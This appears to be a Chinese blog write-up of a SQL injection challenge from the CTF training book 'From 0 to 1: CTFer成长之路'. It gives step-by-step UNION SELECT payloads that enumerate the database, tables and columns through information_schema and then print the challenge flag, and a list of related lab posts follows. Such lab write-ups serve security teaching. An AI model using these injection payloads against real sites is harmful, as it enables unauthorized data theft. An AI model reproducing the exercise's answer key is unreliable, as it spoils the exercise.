《从0到1:CTFer成长之路》

最新推荐文章于 2022-11-15 13:35:16 发布
原创 最新推荐文章于 2022-11-15 13:35:16 发布 · 2k 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全
本文详细描述了一个SQL注入攻击的过程,从判断注入类型到猜解列名数量,再到查看报错位置和信息收集。通过注入技巧,获取了数据库名称、表名及列名,并最终揭示了敏感数据。示例中展示了如何利用`UNION SELECT`从`note`数据库的`fl4g`表中提取信息,揭示了数据`n1book{union_select_is_so_cool}

一、判断注入类型

二、猜解列名数量(字段数)

?id=1' order by 1%23

发现4,页面不正常,所以字段数为1,2,3

 三、查看报错位(报错位:2和3)

?id=123' union select 1,2,3 %23

四、信息收集

1、数据库名称:database()

得到数据库名称:note

2、表的信息

?id=123' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='note'%20%23

得到两个表:fl4g,notes

我们要找flag,猜测应该在fl4g表里面

 

3、列的信息

?id=123' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='fl4g' %23

得到列:fllllag

 

4、获取数据

?id=123' union select 1,database(),group_concat(fllllag) from note.fl4g %23

 n1book{union_select_is_so_cool}

 

读书笔记:从01.pdf
10-04
读书笔记:从01.pdf
01CTFer成长之路-Nu1L战队-国内名牌战队的书籍 !!!最全最火的书籍!!!
01-28 1208
01CTFer成长之路-Nu1L战队-国内名牌战队的书籍有需要的联系QQ:406991006
01——CTFer成长之路(一)
youngerll的博客
03-08 5242
这里写自定义目录标题从01——CTFer成长之路(一)Docker安装 从01——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
01CTFer成长之路——1git(全网最详细)
m0_52555753的博客
11-15 1554
网络安全
《从01CTFer成长之路》书籍配套题目-[第二章 web进阶]文件上传
weixin_46703850的博客
02-24 3377
[第二章 web进阶]文件上传开始行动绕过第1个限制绕过第2个限制 介绍:记录一下笔记,方便以后迅速回忆使用。 《从01CTFer成长之路》书籍配套题目,来源网站:《从01CTFer成长之路》 先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo '
01:CTFer成长之路(笔记不断更新)
hxhxhxhxx的博客
01-26 6275
ctfer01web入门信息搜集 web入门 信息搜集 敏感目录 敏感备份文件 Banner识别
《从01CTFer成长之路》afr_3
ZhShy
01-16 1556
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
《从01CTFer成长之路》书籍配套题目-[第一章 web入门]常见的搜集
weixin_46703850的博客
02-09 1662
《从01CTFer成长之路》书籍配套题目,来源网站:《从01CTFer成长之路》
《从01CTFer成长之路》书籍配套题目-[第二章 web进阶]XSS闯关
weixin_46703850的博客
02-23 1877
《从01CTFer成长之路》书籍配套题目,来源网站:[《从01CTFer成长之路》](https://book.nu1l.com/)
《从01CTFer成长之路》书籍配套题目-[第二章 web进阶]SSRF
weixin_46703850的博客
02-23 381
《从01CTFer成长之路》书籍配套题目,来源网站:[《从01CTFer成长之路》](https://book.nu1l.com/)
《从01CTFer成长之路》 配套题目Web WP
热门推荐
feng的博客
10-05 2万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从01还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套题目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
01——CTFer成长之路(三)
youngerll的博客
03-09 1067
01——CTFer成长之路(三)SSRF漏洞SSRF Training命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传 第二章 web进阶 SSRF漏洞 SSRF Training 命令执行漏洞 死亡ping命令 XSS的魔力 XSS闯关 web文件上传漏洞 文件上传 ...
01CTFer成长之路
自然语言处理
10-03 1083
作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-0101CTFer成长之路(精装版)
《从01:CTFer成长之路》靶场练习手记
X_python321的博客
03-07 1586
第一章 web入门 环境:主机Win10+VM 12 pro+Ubuntu 20 VM安装包链接 链接:https://pan.baidu.com/s/159zcAsCSctaz_TmrrEribg 提取码:riiq licence可自行百度 Ubuntu 的镜像可以从阿里的开源镜像站下载 阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 注意事项1:VM安装Ubuntu的时候选择配置尽量大一点,笔者第一次安装时选择的配置是1G内存 11处理器(这个是安装时系统默认推荐的配置),可以正
i春秋《从01CTFer成长之路》通关WP
07-08 5454
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
《从01CTFer成长之路》书籍配套题目-[第三章 web进阶]逻辑漏洞
weixin_46703850的博客
02-24 1366
[第三章 web进阶]逻辑漏洞
《从01CTFer成长之路》粗心的小李
tr_trTTT的博客
04-02 3143
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利用工具GitHack或者Git_Extract-master把泄露的内容下载下来 下载下来的文件就会在这边 直接打开就可以看到flag n1book{git_looks_s0_easyfun} ...
《从01CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 1179
《从01CTFer成长之路》书籍配套题目,来源网站:[《从01CTFer成长之路》](https://book.nu1l.com/)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值